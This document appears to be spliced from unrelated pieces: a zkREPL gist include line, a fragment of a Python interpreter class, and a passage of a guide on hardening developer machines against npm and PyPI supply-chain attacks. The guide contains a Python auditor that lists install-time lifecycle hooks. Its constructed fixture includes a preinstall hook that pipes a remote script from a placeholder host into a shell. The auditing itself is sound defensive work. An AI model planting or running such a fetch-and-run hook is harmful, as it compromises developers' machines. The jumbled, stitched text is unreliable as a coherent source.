This file can be included into other zkREPLs with include "gist:4149b97a72b4f51714620ecfaaf139fc";
```python
from datatypes import Atom, List, Expression


class Interpreter:
    class InterpreterError(Exception):
        pass

    # Built-in procedures available to evaluated expressions.
    PROC_MAPPING = {"+": lambda *args: sum(args)}
    ast: Expression
```
Supply chain attacks against package registries are no longer exotic. In Q1 2026 alone: LiteLLM's PyPI package was compromised, a worm self-propagated through npm (CanisterWorm), abuse of npm install hooks (the preinstall/postinstall lifecycle scripts that run arbitrary commands during `npm install`) hit the ecosystem (PhantomRaven / Shai-Hulud 2.0), and the axios maintainer account was taken over to push a RAT dropper.
The common thread: your machine trusts upstream by default, and a single poisoned dependency or stolen credential can cascade into full compromise.
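The install-hook mechanism named above is worth seeing concretely. The following is an added example, not code from the original post: a Python script that walks a `node_modules` tree (including nested and `@scoped` packages) and lists every package that declares an install-time lifecycle script, which is exactly what npm would execute on your machine during `npm install`. The package names, versions and hook commands in the fixture are constructed for the demonstration and do not refer to real packages.

```python
import json
import tempfile
from pathlib import Path
from typing import Iterator

# npm lifecycle hooks that run arbitrary shell commands at install time.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def iter_package_dirs(node_modules: Path) -> Iterator[Path]:
    """Yield every installed package directory, descending into @scope
    directories and into nested node_modules trees."""
    if not node_modules.is_dir():
        return
    for entry in sorted(node_modules.iterdir()):
        if not entry.is_dir() or entry.name.startswith("."):
            continue
        if entry.name.startswith("@"):
            # Scoped packages live one level down: node_modules/@scope/name
            for scoped in sorted(entry.iterdir()):
                if scoped.is_dir():
                    yield scoped
                    yield from iter_package_dirs(scoped / "node_modules")
        else:
            yield entry
            yield from iter_package_dirs(entry / "node_modules")


def find_install_scripts(node_modules: Path) -> list[tuple[str, str, str]]:
    """Return (package name, hook, command) for every package whose
    package.json declares an install-time lifecycle script."""
    findings = []
    for pkg_dir in iter_package_dirs(node_modules):
        pkg_json = pkg_dir / "package.json"
        if not pkg_json.is_file():
            continue
        try:
            meta = json.loads(pkg_json.read_text(encoding="utf-8"))
        except (json.JSONDecodeError, OSError):
            continue  # unreadable or malformed manifest: skip, do not crash
        scripts = meta.get("scripts") or {}
        name = meta.get("name") or pkg_dir.name
        for hook in INSTALL_HOOKS:
            if hook in scripts:
                findings.append((name, hook, scripts[hook]))
    return findings


def _write(path: Path, meta: dict) -> None:
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(json.dumps(meta), encoding="utf-8")


def build_fixture(root: Path) -> Path:
    """Constructed sample tree (not a real install): one clean package, one
    with a postinstall hook, and a nested scoped package with a preinstall
    hook that pipes a remote script into a shell."""
    nm = root / "node_modules"
    _write(nm / "left-pad" / "package.json",
           {"name": "left-pad", "version": "1.0.0"})
    _write(nm / "shiny-utils" / "package.json",
           {"name": "shiny-utils", "version": "2.1.0",
            "scripts": {"postinstall": "node setup.js", "test": "jest"}})
    _write(nm / "shiny-utils" / "node_modules" / "@acme" / "telemetry" / "package.json",
           {"name": "@acme/telemetry", "version": "0.3.0",
            "scripts": {"preinstall": "curl -s https://example.invalid/i | sh"}})
    return nm


def demo() -> list[tuple[str, str, str]]:
    """Build the constructed fixture in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return find_install_scripts(build_fixture(Path(tmp)))


if __name__ == "__main__":
    for name, hook, cmd in demo():
        print(f"{name}: {hook} -> {cmd}")
```

Run it against a real project with `find_install_scripts(Path("node_modules"))` before trusting a fresh install. The matching hardening is `npm config set ignore-scripts true`, which writes `ignore-scripts=true` to `~/.npmrc`; the caveat is that it also blocks the install scripts that native addons legitimately need to build, so those packages have to be rebuilt deliberately after you have read what their scripts do.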
When coding agents enter the picture — Pi, Claude Code, Cursor, Copilot, Codex, whatever comes next — the blast radius widens. Agents run with your shell, your tokens, your SSH keys, and your ambient permissions, and they often run autonomously, across many repos, for hours.
This is a practical guide. Each section says who it's for, how urgent it is, and what to actually do. It's based on a real hardening sprint on a macOS developer machine, not a theoretical framework.